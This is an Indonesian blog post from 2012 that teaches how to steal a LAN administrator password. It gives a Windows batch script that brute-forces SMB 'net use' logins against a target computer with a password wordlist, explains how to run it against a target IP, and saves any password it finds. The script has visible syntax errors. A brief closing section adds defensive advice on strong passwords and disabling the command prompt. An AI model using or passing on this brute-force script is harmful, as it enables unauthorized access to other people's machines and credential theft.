Mencuri Password administrator LAN

Diposting oleh Keiruchan Agatha on Kamis, 03 Mei 2012


Untuk mencuri password admin LAN, Anda tidak perlu bingung2 menggunakan tool atau software.Cukup salin beberapa perintah DOS berikut ini dan simpan di drive C: (sebagai contoh)
ketik scrip di bawah ene:

@echo off
if "%1=="" goto fin
if "%2=="" goto fin
del logfile.txt
FOR /F "token=1 %%i in (passlist.txt) do ^
echo %%i && ^
net use \\%1\ipc$ %%i /u:%1\%2 2>>logfile.txt && ^
echo \\%1\ipc$ acct: %2 pass: %%i >> output.txt && goto end
:fin
echo

Simpan ketikan anda di folder C:\Attack dengan nama lanbrute.bat sehingga hasilnya adalah sebagai berukit :C:\attack\lanbrute.bat.
Selain itu Anda juga harus memiliki kamus password list ( dictionary password ) yg isi file nya adalah data password dan di simpan dalam satu folder yg sama dengan file lanbrute.bat dan namanya harus passlist.txt.

Untuk menjalankan perintah ini Anda harus masuk ke menu RUN ketik cmd. Setelah itu ketik:
c:\attack\lanbrute.bat 192.168.1.2 administrator
-->192.168.1.2 ---target komputer
-->administrator --user komputer target yg akan di hack password nya
Setelah di jalankan akan mencari password yg sesuai dengan passlist.txt dengan username administrator dan perintah ini akan mencari password sampai dapat.Setelah ketemu passwordnya, hasil hack password akan di simpan di file output.txt.

Mencegah Pencurian Password Admin LAN

Untuk mengantisipasi serangan Dictionary Attack, administrator hendaknya membuat password yang kuat dan sulit di tebak melalui kombinasi huruf-angka serta sejumlah karakter lainnya. Di samping itu, perlu juga menonaktifkan menu Command Prompt agar tidak mudah di akses oleh user yang usil. Karena dari mene inilah aktifitas hacking di lakukan seperti Netbios dan lain-lain. Caranya, melalui tombol Start -> Run, ketik gpedit.msc, lalu tekan ENTER. Setelah masuk jendela Group Editor Policy Window, pilih User Configuration -> Administrative Templates -> System ->. Pada jendela sebelah kanan, cari Prevent Access To The Command Prompt lalu double klik. Setelah itu, klik Enable -> Apply -> Ok -> kemudian Restart computer.


SELAMAT MENCOBA!!
Share Please :

Posted by : Keiruchan Agatha ~ / Portal Media Informasi Pilihan

Markup Validation Service
Anda telah membaca artikel Mencuri Password administrator LAN Ditulis oleh Keiruchan Agatha pada Kamis, 03 Mei 2012. Kritik dan saran dapat disampaikan via kotak komentar. Anda diperbolehkan mengcopy paste atau menyebar-luaskan artikel ini, namun jangan lupa untuk meletakkan link yang ada di bawah sebagai sumbernya. Atas perhatiannya saya ucapkan terimakasih. Salam blogger and Happy blogging.

Baca Yang Ini Juga Boz :

{ 0 komentar... read them below or add one }

Posting Komentar

Silahkan tinggalkan komentar anda dengan tidak meninggalkan link. Jika ada kesalahan dalam artikel ini dan jika ada saran dan kritik silahkan tulis komentar anda dibawah dengan baik dan sopan... ;)
Dan jika kedapatan link yang mati dalam penempatan software atau game harap beritahukan agar segera diperbaiki...

 
Markup Validation Service Markup Validation Service Markup Validation Service Markup Validation Service Markup Validation Service